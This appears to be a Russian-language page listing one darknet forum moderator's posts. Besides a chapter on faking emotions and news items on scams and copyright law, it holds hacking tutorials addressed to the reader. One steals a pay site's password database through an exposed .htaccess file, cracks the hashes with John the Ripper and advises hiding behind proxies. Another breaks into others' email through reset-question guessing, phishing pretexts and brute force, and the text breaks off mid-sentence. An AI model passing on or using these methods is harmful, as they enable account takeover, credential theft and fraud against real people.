Саппорт
Moderators-
Публикации
123 -
Зарегистрирован
-
Посещение
-
Дней в лидерах
1
Тип публикации
Профили
Форум
Календарь
Tickets
Новости
Blogs
Файлы
Магазин даркнет
Галерея
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
Даркнет видео
Musicbox
Все публикации пользователя Саппорт
-
В этой главе мы рассмотрим такой важный вопрос, как психологическая подготовка социального хакера. Для того чтобы лучше понять действия социальных хакеров и методы, которые они используют, представим на одну главу, что социальные хакеры это мы, и нам нужно научиться действовать. Ведь для того, чтобы понять методы и предугадать шаги злоумышленника, иногда нужно уметь мыслить, как он. Для чего мы в течение этой главы и потренируемся в освоении некоторых методик, используемых социальными хакерами. Ведь главное отличие социальных хакеров от их жертв, пожалуй, только в одном: первые прекрасные психологи и умеют хорошо владеть собой. А быть хорошим психологом — это не только социальным инженерам нужно, а и нам, обычным людям. Хотя бы для того, чтобы уметь от этих самых социальных инженеров защищаться. Примечание Конечно, тренировки — это дело не одного дня. Длительность и режим тренировок для каждого человека индивидуален и очень сильно зависит от доминирующего психотипа. Любое упражнение в тренировках нужно повторять многократно, чтобы усвоить его на уровне рефлексов. Чтобы перед тем, как изобразить гнев на своем лице не думать десять минут, что вот мне сейчас нужно разгневаться, для этого надо вот эту мышцу напрячь, а вот эту расслабить. Это должно происходить автоматически, как автоматически бегают по клавишам пальцы пианиста. Который не думает, что сейчас я вот этот палец положу сюда, а вот этот вон туда, — если во время исполнения произведения он начнет так думать, то запутается в своих пальцах как та сороконожка. Да, поначалу вы можете сами себе казаться смешным во время некоторых тренировок, но не обращайте на это внимания. Это происходит только на начальном этапе, особенно, когда некоторые упражнения получаются не сразу. Зато потом все будут восхищаться вашим мастерством. Тренировка мышц лица Вы наверняка не раз слышали об аутогенной тренировке, или об аутотренинге, как ее еще называют. Вещь крайне важная, для самообладания собой, но сейчас нас заинтересует не расслабление мышц всего тела, а только расслабление мышц лица. Далее будут приведены несколько подобных упражнений, каждое из которых сначала выражает какую-либо эмоцию (напрягаем мышцы), а затем эту эмоцию стирает со своего лица (расслабляем). Для начала эти упражнения лучше делать перед зеркалом, чтобы вы точно могли убедиться, что эмоция, которую вы выражаете своим лицом, это именно та эмоция, а не какая-то другая. Чтобы не получилось так, что изображая праведный и великий гнев, вы изобразили улыбку беспомощного котенка-шалуна, которого застали на месте преступления. Набрав, таким образом, некоторый опыт в управлении своим лицом, вы сможете на фотографиях без всякого грима изображать непохожих друг на друга людей с разницей в возрасте лет в 20 (хотя это вы один, и промежуток между снимками два дня), и наоборот: сумеете сделать так, что сделанные с разницей в несколько месяцев фотографии будут неотличимы друг от друга. Вот несколько упражнений. • "Дерганый" Изобразите человека, всеми мышцами лица которого овладел нервный тик. Веки дергаются, уголки рта дрожат, причем сначала не сильно, не размыкая губ, а потом все сильнее и сильнее, так, что губы уже начинают самопроизвольно размыкаться. Задействуйте в этом дрожании как можно больше мышц лица. И — расслабление. Перестаньте дрожать. Кончиками пальцев рук, слегка касаясь поверхности кожи, поводите по вашему лицу, почувствуйте щекотку на всем лице и, через пару секунд, как только вам станет неимоверно щекотно, быстро разотрите лицо руками. • "Удивление" Встаньте перед зеркалом. Изобразите на своем лице удивление, для чего на вдохе поднимите брови, а на выдохе их опустите. • "Гнев" Сожмите губы, сдвиньте брови, раздуйте крылья носа, в общем, изобразите на своем лице маску гнева. Как вам эта маска? Страшно? Или смешно? Смешно быть не должно, должно быть страшно. • "Брюзга" Опустите уголки рта, слегка напрягите подбородок, сожмите губы. И попробуйте из этой маски брюзги что-то сказать, к примеру, "да я все это и без вас знаю". Если хорошо поработали с лицом, то и голос у вас будет звучать как у брюзги, высокомерно и чуть скрипуче. • "Уставший" Попробуйте сказать "да я все это и без вас знаю" тоном смертельно уставшего начальника, которому настолько надоели нерадивые сотрудники, что у него уже даже нет сил на то, чтобы ругаться. Проговорите это, изображая на лице усталость… Вот такими нехитрыми упражнениями вы сможете добиться того, что ваш голос и ваша мимика со временем начнут автоматически подстраиваться друг под друга. И никто не сможет упрекнуть вас в неискренности, потому что если вы вдруг начнете гневаться, то ваше лицо тоже будет искренне выражать гнев, а если вдруг станете говорить тоном уставшего человека, то и на лице отразится усталость. Придумывайте сами для себя эти упражнения, а также и выполняйте их, моделируйте самые различные эмоции. Поверьте, что когда вы научитесь владеть своим лицом, то все это сослужит вам огромную службу. Переключение между психологическими типами Введение в психологическую типологию описано в приложении 2 к этой книге. Посмотрите, какими разными могут быть люди, даже если смотреть на человека глазами какой-то одной из классификаций. Попытайтесь поиграть в такую игру. Возьмем для примера шкалу Кречмера (см. приложение 2). Попробуйте сегодня быть циклотимиком, а завтра — глубоким шизоидом, одним из самых ярких примеров которого являлся Дон Кихот. А послезавтра станьте экстравертом. А на следующий день замкнитесь, впадя в глубокую интроверсию. А еще через день станьте циклоидом, у которого с четырнадцати до пятнадцати по московскому времени — радость, а с пятнадцати до шестнадцати — глубокая печаль. И у вас должно быть также. А еще через недельку попробуйте себя в роли глубокого шизоида, почти шизофреника. Что вы чувствуете? …Мир двояк. Полная дезинтеграция вселенной. Что я здесь делаю, зачем прилетел я сюда со своей альфы (а) Центравра? Ведь здесь меня преследуют кремигральные сущности. Кто вы, иноки?! Прочь от меня! Зачем вы меня лапаете своими ручищами (это люди вас по плечу просто дружески похлопали, если вы уже настолько вжились в роль и не поняли в чем дело)? Прочь, я сказал! Не ломайте мои тайные системы… Я верю в агонию огня… Я занят теорией межвременного непостоянства в параллельных временных измерениях… …А еще побудьте день флегматиком, день холериком, день меланхоликом, день обезьяной вертлявой, день — крокодилом Геной. …Если тренировки будут регулярными и качественными, то через некоторое время вы, как минимум, свободно воспроизведете практически любой психотип, а, как максимум, кроме этого, научитесь еще и определять, кто перед вами. …Вот впереди вас идет человек, подождите, не обгоняйте его… Попробуйте вжиться в него — что он чувствует сейчас? Какой у него психотип? Не получается сразу сказать? Подстройтесь под него, под этот слегка шаркающий шаг, чуть сгорбленную спину, под движения рук. Посмотрите, как он двигает руками. Очень интересно… Он не дает им двигаться свободно, он их как будто тормозит — пошла рука в движение, вдруг встала как вкопанная и назад. Снова встала, и вперед. Проделайте также. А как он несет сумку в левой руке, заметили? Как нервный рыбак леску все время поддергивает вверх, так и он свою сумку. Тренируйтесь, благо для таких тренировок не нужно спортзалов, тренажеров и даже спарринг-партнеров. Идете, к примеру, до работы и тренируйтесь. Тренировка эмоций Об этом написано много. Где-то правдиво, где-то намеками, где-то откровенно лживо, потому что не сработает… Для того чтобы разобраться, потребуется отдельная книга, поэтому ограничимся намеками, и приведем несколько примеров. К примеру, вы боитесь делать какое-то опасное дело. Не знаю что: лезть на большую высоту без страховки, прыгнуть с парашютом, погрузиться с аквалангом… Что угодно. И вы никак не можете отделаться от мысли, что с вами во время выполнения этого рискованного мероприятия что-то случится. Как этого можно избежать? Этого парализующего страха, что во время какого-то мероприятия с вами случится что-то страшное. А представьте себе, что уже случилось. И не завтра, во время выполнения "мероприятия", а сейчас, сегодня. Вот боялись вы, боялись этого завтра, а случилось все сегодня. Дом рухнул. Бывает нынче такое. Террористы, сами знаете. Или архитекторы и строители недобросовестные, которые в одном ряду стоят с теми, кто взрывает… Представили? Хорошо представили? Вжились в ситуацию? Проиграли ее до мелочей? Представили, как вас, еле живого, вытащили из-под завалов (счастливый случай еще!), потом два месяца в реанимации, полгода на больничной койке в общей палате, и еще два года реабилитации без гарантий восстановления подвижности рук и ног… Все хорошо представили? Про родственников не забыли? Что значит в каком смысле? В том смысле, что вам одному так повезло. Всем остальным не повезло. Вы остались один. Представили? А теперь представьте, что за 10 минут до всего этого кошмара, как дом рухнул, к вам спустился ангел-хранитель и предоставил выбор: или все будет так, как описано, или ничего такого не будет, но только вам вон то мероприятие, которое на завтра намечено и которого вы так боитесь, нужно выполнить. Что вы ему ответите? "Да хоть сейчас, да хоть десять раз в день и так на протяжении всей жизни, лишь бы вон то не случилось!" Посмотрите, как вы уже реагируете на ситуацию… И запомните эту ваше эмоциональное состояние, и включайте его тогда, как только начнете чего-то бояться… Я сам так себя раньше настраивал… И другим помогало. Начиная от ведения переговоров, когда человек органически боится заговорить с другим человеком, и заканчивая вещами достаточно экстремальными. К начальнику боишься подойти? А представь, что тебе завтра врач скажет… Что скажет? Ну что все — "отговорила роща золотая"… В смысле, что все настолько запущено, что уже неоперабельно. …Начальник говорите? Да кто он вообще такой!?… …Я тоже так бывает себе представляю. Не хочется, порой, на те или иные переговоры ехать, клиент сложный, нужно будет напрягаться, выдумывать чего-то… И тут же говорю себе: а представь, что завтра у тебя будут не переговоры… Нет, завтра у тебя будет кое-что покруче. Завтра тебе медпомощь придется оказывать… Троим одновременно. В ДТП они попали, а ты рядом оказался. Одному массаж сердца непрямой нужно делать, потому как сердце встало, у второго кровотечение из бедренной артерии, а у третьего проникающее ранение грудной клетки, сопровождающееся пневмотораксом. А у тебя кроме рук своих нет ничего. И будешь ты метаться меж ними, как бешенный таракан. И будешь шмотки разрывать, чтобы какое-то подобие жгута из них сотворить для того, у которого кровотечение из бедренной… И будешь вырывать пакеты полиэтиленовые из рук прохожих, чтобы тому, у которого пневмоторакс помочь… И кому-то одному, как минимум, все равно вряд ли поможешь… …Переговоры говорите, там у нас на завтра запланированы были? Сколько? Десять за день? И все клиенты психопаты? Боже, какая ерунда… Другой пример. Надо вам, к примеру, вызвать рвоту. Не засовывая два пальца в рот, а сугубо усилием мысли. Возможно, и даже совсем не сложно. Вспомните, какие предметы вызывают у вас рвоту. И представьте их ясно и четко перед глазами. Если не получается так просто, то потренируйтесь, посмотрите на них, так чтобы до… До рвоты. А потом научитесь вызывать рвоту, чтоб без смотрения… Чтобы как только подумал, так сразу и… Зачем все это нужно? К примеру, это умение может пригодиться в "схватке" с уличными хулиганами, когда ситуация из разряда "их восемь, нас двое, расклад перед боем не наш…". А бежать некуда. Драться? Можно, и даже с победой, только личности из разряда очень сильно отмороженных, и их, чтобы они остановились, нужно только убивать, как собак бешенных. А после этого, не ровен час, что и "по этапу поведут". Нужно? Если нет, то можно использовать такой прием. Ну в смысле "обрвотиться". Помогает и нередко. Потому что мараться не хотят даже полные отморозки. Примечание Этому нехитрому приему я учил тех, кто уходил в армию в части с повышенным содержанием отморозков, дедовщины, т. е., если культурно выражаться. Помогало. В совокупности с другими приемами, такими как "эпилептический припадок", внезапный обморок и т. д. "Высший пилотаж" в целенаправленном моделировании эмоций — суметь вызвать у себя "отключку сознания". Как это делается? А все так же, как и в первых двух случаях. Надо, к примеру, бойцу спецназа во время пыток не сознаться, когда его с особым пристрастием начнут допрашивать. А он — бац, — и в обморок, что твоя чувствительная барышня. А дело в том, что спецназовцу этому во время его подготовки к особо опасным миссиям вводили вещество, вызывающее потерю сознания, и заставляли запоминать его свои ощущения. И в случае чего, раз, — и в обморок. Да, конечно, без тренировок, и немалых, тут не обойдешься, но сам факт того, что это возможно сделать — уже немало. Поскольку чуть ранее речь зашла о хулиганах, то приведу два собственных способа настройки на борьбу с оными. Если вижу, что никак не миновать полноконтактной встречи, перевоплощаюсь в роль садиста, которого не корми, а дай лишь зубы у кого-нибудь пассатижами выдрать. И в таком состоянии иду на встречу, попутно намечая, у кого первого буду что-то выдирать и, представляя, как после лишения какой-либо части тела эти бравые парни будут корчиться в муках. Ну, иди сюда! Чего ты хочешь? Чтоб я тебе ноги полизал? Да ради бога. На этот случай у меня дополнительная роль заготовлена. Вампира внезапного, который сначала нагнется и на колени встанет, ну чтоб ноги полизать, а потом внезапно, с диким-диким рыком, с воплями во всю мощь, рубанув себе рукой по губам, чтоб кровью изо рта на полулицы, — вперед! На них! С одним лишь желанием — разорвать на куски. …Куда вы все побежали-то? Я ж сказал "иди сюда", а не отсюда. …Какие-то хулиганы нынче пошли особо чувствительные.
-
Митрополит Климент: Интернет способствует распространению зла
Саппорт добавил тему в Социальная инженерия
Священнослужитель уверен, что высокая скорость современного интернета способствует созданию и распространению зла. Высокоскоростной интернет способствует распространению зла. По данным «Интерфакса», такое заявление сделал известный церковный деятель, митрополит Калужский и Боровский Климент. Митрополит считает, что высокоскоростной интернет способствует быстрому появлению и распространению «зла», поскольку для создания чего-то плохого не нужны определенные навыки или умения. Тем не менее, для того чтобы создать что-то полезное, потребуются значительные усилия, время и духовный настрой, даже с учетом современных технологий. Сам интернет митрополит не воспринимает в качестве воплощения зла. Он согласен с тем, что глобальная сеть – всего лишь технология хранения и передачи информации, наподобие глиняных табличек, папируса и прочих способов хранения данных. Митрополит Климент (в миру Герман Капалин) председательствует в Издательском совете РПЦ и является одним из постоянных членов Священного Синода. С 2005 года священнослужитель вошел в Общественную палату. -
Пользователям приложения предлагают деактивировать индикатор непрочитанных сообщений. Специалисты компании ESET обнаружили новый вид мошенничества, связанный с популярным мессенджером WhatsApp - абонентам приложения предлагают деактивировать индикатор непрочитанных сообщений. В ноябре этого года в мессенждере WhatsApp была реализована новая функция - индикатор непрочитанных сообщений. Одна серая пометка означает, что сообщение поступило на сервер программы, две - на мобильное устройство и двойная голубая свидетельствует о том, что окно чата открыто пользователем. Данная инновация пришлась по душе не всем поклонникам приложения, однако пока функцию отключить невозможно. Возмущением абонентов одного из самых популярных мессенджеров не преминули воспользоваться киберпреступники. Они размещают в социальных сетях сообщения с предложением деактивации индикатора. Для этого пользователям необходимо перейти по короткой ссылке и далее действовать согласно указаниям. Как сообщают эксперты ESET, одна из ссылок ведет на web-страницу с формой, на полях которой необходимо ввести номер мобильного телефона. Однако вместо отключения нежелательной функции пользователь оказывается подписанным на дорогостоящие SMS-сервисы. Короткие ссылки могут также перенаправлять абонентов на фишинговые ресурсы или порталы, содержащие вредоносное программное обеспечение.
-
Президент России позволил пожизненно блокировать пиратские web-сайты
Саппорт добавил тему в Социальная инженерия
Действие поправок к «антипиратскому» закону будет распространяться на все виды интеллектуальной собственности. Глава российского государства Владимир Путин утвердил коррективы к «антипиратскому» закону, сообщает портал РБК. Действие поправок будет распространяться на все виды интеллектуальной собственности, в том числе на музыкальные и литературные произведения, а также программное обеспечение. Исключение составят только фотоснимки. За несоблюдение законодательных требований ресурсы-нарушители будут пожизненно заблокированы. . При этом в документе предусмотрена возможность досудебного решения разногласий интернет-ресурсов и владельцев авторских прав. Закон также предусматривает перманентное отключение web-сайта в случае двух проигрышей в судебных процессах по иску одного и того правообладателя. Подобные решения будет принимать Мосгорсуд. В этом случае судебная инстанция должна будет проинформировать о своем вердикте Роскомнадзор, а тот – потребовать у операторов связи в течение 24 часов заблокировать доступ к ресурсу, содержащему нелегальный контент. Также ведомство будет вносить злостных нарушителей в реестр. Пункт о перманентной блокировке вызвал наибольшее количество критики среди юристов и экспертов по авторскому праву. По мнению главного аналитика РАЭК Карена Казаряна, перманентная блокировка web-сайтов предоставляет владельцам авторских прав слишком большую власть над интернет-ресурсами. При этом откровенно пиратские порталы эта мера никак не заденет, поскольку они с легкостью могут «переехать» на «другой адрес». Изменения в закон начнут действовать с 1 мая 2015 года. 14 ноября текущего года Госдума РФ приняла законопроект во втором и третьем чтении. Совет Федерации ратифицировал документ 19 ноября. -
Постоянно слышу вопрос, ни разу не видел хорошего ответа. Как-то даже видел книгу с таким названием. В ее первой главе автор на полном серьезе советовал почувствовать себя дерьмом, чтобы преисполниться нужных эмоций и настроиться на взлом. Что ж, удачи тем, кому этот способ понравился, а у меня другое видение проблемы. Рискну высказать. Хакер – человек, способный выжать все возможное из того, что у него в распоряжении. Поэтому, имея такой же доступ к системе, что и обычный человек, он иногда способен ее взломать (именно «иногда», бывают случаи, когда систему нельзя взломать в принципе). Вот и все, что отличает хакера от простого смертного. Соответственно инструкция по апгрейду от простого смертного до хакера проста - измените себя так, чтобы выделенные высказывания относительно вас были справедливы... Способность получить все, что теоретически возможно получить, дается доскональным знанием системы и особым складом ума, не пропускающим никакие варианты, особенно нетривиальные. Обо всех составляющих по порядку. Доскональное знание системы – это понимание того, как система работает. Для понимания работы программы идеально подходят исходники в сочетании с умением их читать, то есть понимать алгоритм по тексту программы. Опытные хакеры способны понимать программу, написанную на языке, который они никогда в жизни не видели. Не всегда исходники доступны, тогда может пригодиться знание ассемблера и отладчиков, которое позволяет понимать алгоритм любой программы, находящейся на подконтрольном компьютере. Это тяжелее. В самом тяжелом (и самом частом) случае, когда программа находится на удаленном компьютере, и хакер ничего о ней не знает, приходится лишь догадываться, как она устроена. Тут требуется опыт анализа и написания аналогичных программ и программ вообще. Короче говоря, хакеру совсем не помешает быть опытным программистом. У серверных программ есть еще одна особенность – полезно знать протокол, по которому она работает. Протокол – набор правил, по которому общаются стороны (программы, компьютера, системы). Он нужен для того, чтобы стороны могли понимать друг друга. Большинство протоколов хорошо описаны авторами, лишь изредка приходится сталкиваться с недокументированными протоколами и догадываться, что они из себя представляют. Описания большинства протоколов есть на сайтах RFC, вот один из них: http://the.rfceditor.org/ У протоколов могут быть слабые места - проблема, которую автор программы не может исправить – он просто выбрал не тот протокол, возможно, он сам не знает его слабых мест. А вот вам их знать надо. Бывает, что программист допускает отклонения от реализации протокола. Чтобы найти их, просто попробуйте сказать другой стороне не то, что она ждет, и увидите, чем это кончится. Идеально написанная программа должна ответить «ошибка протокола», но при неправильной реализации может произойти нечто, чего не предусмотрел создатель, и что окажется полезно хакеру. Полезно знать об ошибках, допускаемых разработчиками, и о методах их использования (exploit). Детальная информация о них излагается в так называемых security advisory, которые можно встретить на сайтах серьезных групп, занимающихся проблемами безопасности. Всемирная база данных advisory есть на www.securityfocus.com, полезно почитать. Это все, что касается знаний. Теперь - о мозгах. Мозги не должны быть застарелыми, иначе дальше использования известных дырок и средств автоматизированного взлома «хакер» не пойдет. Для тестирования застарелости мозгов предлагаю такую шуточную задачку про обкуренную ласточку . Требуемый уровень знаний – 5 класс, однако, чем человек старше, тем сложнее ее решить… Поезд едет из А в Б. Расстояние – 120 км. Скорость поезда – 40 км/час. Навстречу поезду из Б вылетает ласточка со скоростью 60 км/час, долетает до поезда, разворачивается и летит обратно в Б, разворачивается, летит к поезду… Так до тех пор, пока оба они не прибудут в Б. Вопрос: какое расстояние пролетела ласточка? Второе требование – любовь к brainfucking’у. Переводить слово целиком не буду, скажу только, что brain – «мозги». Так вот, хакер обязан любить brainfucking, иначе не сможет заниматься исследованиями, без которых он – жалкая, ничтожная личность, паразитирующая на чужих достижениях . Последнее требование, о котором я скажу, скорее психологическое. Хакеру предстоит устоять перед славой, не «спопситься», ведь понтоваться перед толпой на порядок проще, чем заниматься серьезными исследованиями. Если он не устоит, то станет просто клоуном, работающим на потеху зрителям, и на этом его развитие остановится. Если после прочтения текста вы все еще не передумали становиться хакером - вперед! Удачи.
-
Сегодня мы будем иметь (в хорошем смысле) порно сайты! Тебе наверное надоело лазить по бесплатным порно-сайтам, заходя на которые, открываются ещё 50 окошек . Ну ладно будем добывать базу паролей порно-сайта. Чем не мечта для халявщика, коим ты и являешься? Вобще этот спорсоб катит с любым сайтом, но ведь порносайты наиболее неустойчивы к взломам, ты только представь себе админа порносайта =). Только предупреждение: за возможные траблы по поводу твоего взлома я никакой ответственности, естественно, не несу. Приступим же, наконец, к трепанации adult-ресурсов =). Описание процесса У каждого порносайта есть несколько зон. Нет, не эрогенных, как ты может подумал, а просто зон =). Ты, наверное, видел при заходе на какой-либо такой сайт менюшки типа Free Tour, Register и For Members. Первая нам нахрен не нужна, хотя, если хочешь получить общее представление о тематике фоток и вообще порно-сайта, можешь быстренько пробежаться и по ней. Вторая менюшка, Register, имхо предназначена либо для толстых озабоченных онанистов =), либо для ламаков, у которых руки не из того места растут. Так как к нам это, естественно, не относится, то выбираем последний пункт - For Members (для членов, хехе =) Тут ты, введя пароль и логин для входа, попадёшь на сайт. Принцип действия таков: введя пароль с логином, ты оправляешь форму, где она сравнивается со списком паролей зарегистрированных онанистов и в случае полного соответствия пропускает тебя внутрь. Ни пароля, ни логина ты, конечно, пока не знаешь. Вот мы и займемся тем, как бы их свистнуть =). На некоторых порносайтах (но не всех!) до сих пор есть такая рульная для нас фишка, как баг .htaccess Этот файл содержит множество инфы - от списка локализации различных ресурсов до, в некоторых случаях, паролей. А последние нам как раз нужны! В большинстве своём .htaccess является сортировщиком в отношении доступа к дирам и, есесно, к файлам. С его помощью мы можем просмотреть скрытые или запрещённые диры через броузер. Для получения доступа к файлу в URL'е хакер знает какой длины, нам будет достаточно ввести основной адрес хоста, слэш ( \ ), нэйм самого файла или диру, еще раз слэш, и в конце .htaccess Доступ обеспечен. Принцип порно-сайтовской системы достаточно прост, главное пораскинь мозгами. Ты можешь изучить структуру каталогов и, чуть попарившись, вывести passwordlist, но для этого нужно быть знакомым с атакуемой системой. Ты должен знать, как там построены директории, какой в них лежит принцип. Потому как если неверно задашь диру - ничего не получится соответственно =(. Но можно поступить проще - Хакер опять приходит тебе на помощь! =) Просто сходи на http://ultrapasswords.com/. Зашел? Ну что же, отлично. На этом кульном сайте ты сможешь найти сотни пассов для различных буржуйских порно-сайтов. Только не кидайся сломя голову на первый попавшийся сайт, со счастливым видом вводя увиденный там пароль. Мы же делом заняты! =) Итак, возьми на обозначенном серваке пароль к тому сайту, который хочешь хакнуть. Даже если не нашел (что вряд ли), то возьми пасс для другого сайта: мы же должны что-то взломать! =) Затем, с полученный логином и паролем войди в зону для членов ака Member Zone. Теперь ты внутри! =) Обрати сейчас внимание на урл, он может иметь примерно такой вид: http://www.pornosite_name.com/members/index.html, или на конце может быть default.html, но это не важно. Важно другое: вместо index.html вставь заветное .htaccess Тогда строка адреса примет такой вид: http://www.pornosite_name.com/members/.htaccess Теперь, если тебе повезет, ты должен увидеть примерно следующее: AuthUserFile /www/pornosite_name/members/.htpasswd именно нужное нам место, где лежит файл с паролями (может быть и другая структура директорий, я взял эту лишь для примера). AuthGroupFile /dev/null здесь находится groupfile AuthName Members Only Directory помнишь то окошко, которое требует ввести логин/пасс? Вот оно-то и лежит по этому адресу =). Кроме этого здесь, возможно, будет и другая инфа, которая нам не и нужна. В итоге теперь ты знаешь, где находится нужный нам файл с паролями. Он так и называется passwordfile. Ты, наверное, уже ручки от удовольствия потираешь, но обломись: пароли все зашифрованы. Например: suporgazm:71aLc8qpWPzd, где suporgazm-логин, а 71aLc8qpWPzd-зашифрованный пароль. Но спешу тебя утешить: это поправимо =). Просто берешь и с родимого http://astalavista.box.sk/ скачиваешь известную тебе прогу "John the Ripper". Все найденные пароли сохраняешь в текстовый файл и притом не где попало, а в ту диру, куда ты заинсталлил "Джона". Теперь, чтобы расшифровать пароли, заюзай следующие команды: John xxx.txt -single (Самый быстрый способ, и в то же время самый простой алгоритм) John xxx.txt -wordfile:password.lst (Это посложней, можно сказать, самый средний по всем параметрам метод) John xxx.txt -incremental (Это самый сложный алгоритм и занимает время, но он и самый надежный) Выбирай нужную и действуй! В итоге, ты имеешь всю базу паролей желанного порносайта, к чему, собственно, мы и стремились. Вот и все! Видишь, как все просто? А ты-то думал… =) Таким образом можно поиметь и множество других сайтов, используя баг файла .htaccess. Но делай это как можно осторожней: не мне тебя учить этому, хацкер. Чтобы снизить вероятность траблов на свою задницу, всегда используй прокси, взятые, например, со http://spylog.ru/. Удачи тебе, хацкер!
-
Есть основные 4 способа взлома мыла. 1. Отсылка на атакуемое мыло сообщения, содержащего какой-то код, который после своего выполнения, позволит получить пароль или изменить его на нужный. Опять же, если мыло не соседа-собутыльника, а чего-то более серьезного, то письма получают не дырявым аутглюком и не експлорером, а почтовым клиентом с отключенным выполнением скриптов. Плюс еще их просматривают в диспетчере сообщений на предмет приатаченных файлов и на серваке стоит брандмауэр, который автоматом переименовывает все прикрепленные выполняемые файлы. Облом. Только засветиться. И ничего конкретно тут пообещать нельзя. 2. Ошибки web-интерфейса сервиса для работы с почтой. В частности, подмена запросов после авторизации на своем мыле так, чтобы вплыть в настройки чужого. Это все уже практически везде пофиксено. Останавливаться на этом не буду. 3. Взлом самого сервака с почтовым сервисом. Т.е. надо всесторонне изучить сервер, найти на нем дырки, найти бесплатный работающий эксплоит и т.д. и т.п. Дырок может и не быть или соответствующие эксплоиты платны или не выставленны на всеобщее обозрение. Тем более, если ты взломал сервер с серьезным мылом, то нафиг тебе за копейки продавать эту инфу. Если кто-то знает как им распорядиться, то имея сервак в кармане ты и сам можешь об этом догадаться. Или можно продавать информацию кусками, по мере ее поступления. В любом случае, обещание по поводу недели на взлом... 4. Брутфорс. Самый тупой способ. Перебор паролей по словарю или подряд всех символов. Остановимся более подробно на этом способе. Первое, что нужно для этого, это словарь. На этом же форуме я обнаружил еще одно очень веселое объявление о продаже файла, содержащего 360000 паролей. Файл паролей можно взять где угодно. Даже просто пойти и скачать какую-нибудь программу-переводчик. Теперь немного математики. Рассмотрим такой случай: пароль - не слово, а случайный набор маленьких английских символов. Для того, чтобы подобрать 2-ух буквенный пароль, по теории вероятности, надо 26*26/2=338 раз перебрать пароль. Для трехбуквенного - 26^3/2=8788, для четырехбуквенного - 26^4/2=228448 и т.д.. Тут, конечно, есть варианты. Можно сначала перебирать так: первая буква - гласная, вторая - согласная; первая - согласная, вторая - гласная. Но, если пароль состоит не только из маленьких английских букв, но и из больших, плюс цифры и спец-символы, то большой облом. Одно дело у себя локально на крутом компе подобрать пароль к excel-евскому документу, а другое дело по инету. Итак, мы определились, что прямой перебор не катит. При таком пароле, надо пробовать первые три способа. Немного о безопасности. Некоторые провайдеры делают мыло так, что получить его можно только выйдя в инет через них. Проверка может быть только на диапазон адресов и есть некоторая возможность для спуфинга, но... В общем, только третий способ. Ломать прова. Взломать его за неделю - это, мягко говоря, несколько опрометчивое высказывание. Или ты уже знаешь как и тогда это происходит за пару часов, или.... Рассмотрим перебор по словарю. Здесь есть несколько вариантов. Самый быстрый - задействовать свой полный шелл на быстром серваке. Есть несколько но : если обнаружат, то аккаунт прикроют. Ради призрачной вероятности заработать несколько денег, рисковать полным шеллом - это сильно круто и расточительно. Использовать прокси - тоже не выход. Можно использовать вариант с каким-то уже взломанным серваком, но см. выше. Его терять еще более обидно. Можно создать web-страницу c поддержкой запуска скриптов и повесить счетчик, который при каждом посещении будет перебирать несколько вариантов. Опять же, пагу могут и закрыть. Все усилия по ее раскрутке может зачеркнуть какой-то админ-мудак. Самый безопасный, но и самый ненадежный способ - накодить спец прогу и занести ее в компьютерный клуб. При работе с инетом, она будет перебирать по чуть-чуть пароли. Потом приходишь раз в ..., и смотришь результаты. Но эту прогу надо еще написать и замаскировать - в этом клубе админы могут полными идиотами и не быть. Ну и, самый распространенный способ - перебирать со своего компа. Есть целый ряд программ для этого, но все они мне, лично, не нравятся, и в этой статье я буду рассказывать, как написать брутфорсер самому. На самом деле, иногда, все не так уж и безнадежно. Рассмотрим несколько реальных примеров. Вернее, я оговорился - все примеры выдуманы, все имена изменены, и любые совпадения абсолютно случайны. Зеркало. Не люблю я спамеров. Вот интересный случай: прочитал я где-то объяву о том, что представитель этой масти может заплатить за спам лист, вытащенный из какого-то сервера. Мыло его было [email protected]. Ломанулся я на www.glukr.net и сразу же нажал Забыл пароль . Служба борьбы с амнезией - очень интересная штука. Человек может указать очень сложный пароль, но правдиво, коротко и просто ответить на вопросы в интересующем нас разделе. Мне высветилось: Ответьте на вопрос: , sex , ясен пень - sex . Опа. Такая приятная табличка Установите новый пароль . Спамер остался без мыла. Для этого мне не понадобилось ничего, кроме моей любимой оперы и 2 минут времени. Идиотизм. Когда-то мне пришло письмо вроде бы от достаточно известной конторы, занимающейся безопасностью. Там было предложение заполнить резюме и выслать его на мыло с уже рассмотренного нами бесплатного, очень популярного, но такого дырявого glukr.net. Резюме было на 3- ех листах с просьбой указать ВСЮ информацию о себе. Я сразу заподозрил неладное. Или кто-то очень хотел получить обо мне всю инфу для каких-то своих черных замыслов и не имел ничего общего с этой конторой (что скорее всего), или в этой конторе есть очень умные люди (см. тему примера). На Забыл пароль у меня спросили рост. Введя пару значений, я обнаружил временную защиту, т.е. за определенный промежуток времени нельзя было вводить более двух вариантов. Рассудив, что карлик какой-то не будет отвечать на вопрос о росте, я начал со 180. Вводя по чуть-чуть цифры, к утру, я увидел такую родную сердцу табличку. Вместо того, чтобы ввести что-то типа 6 futov 1 дюйм + 2 litra пива , там было цифровое значение. Ничего я менять не стал, а то, вдруг действительно людей на работу берут, а я потопчусь своими кроссовками рибок 46-ого размера по большому и чистому.... Социальная инженерия. На некоторых серваках на вопрос Забыл пароль надо указать дату рождения и, например, любимое блюдо. Казалось бы, очень сложно, но.... Надо просто открыть мыло, например, [email protected] и послать с него открытку Поздравляю с днем рождения и какую-нибудь глупую подпись. Вполне возможно, что он ответит У меня не сегодня день рождения, а 32 марта . Или послать сообщение Мы разыгрываем 10000 видов на жительство у америкосов и Вас компьютер выбрал случайно. Укажите в обратном письме Ваше образование и дату рождения и ... . В общем, на первый взгляд, вполне безобидно. Вариантов много. Узнав его дату рождения, перебрать любимое блюдо - можно, но т.к. практически у всех есть временная защита, то тут, скорее всего, если сразу не угадал, тоже облом. Также может быть указано имя матери. Словарь из имен можно составить самому или взять на серваке с гороскопами по имени и прочей лабудой. Тут главное понять, что женских имен не так уж и много, и указывают их обычно не как лена или оля , а Елена или Ольга . Также следует учесть, что человеку иногда облом переключать раскладку и имя может быть в английской транскрипции. Глобальный поиск. Включить поиск по атакуемому мылу. Если это мыло присутствует на какой-нибудь доске объявлений или рассылке, то написать ему соответствующее сообщение (см. пример 3), исходя из полученных сведений. Также пароль в какой-нибудь форум или чат получить иногда гораздо легче, и в большинстве случаев он от пароля на мыло не отличается. Навороты web-сайта. На сервере одного прова обнаружил голосование, с просмотром результатов. Результаты вызывались через url, в котором указывался один из параметров - куда после этого перейти. С соответствующими правами. Гении программирования, мля. Там еще был дополнительный web-интерфейс для работы с почтой. В корень выйти не получилось, но сходив к ним, потратив несколько баксов на диалап и мыло, просканировав 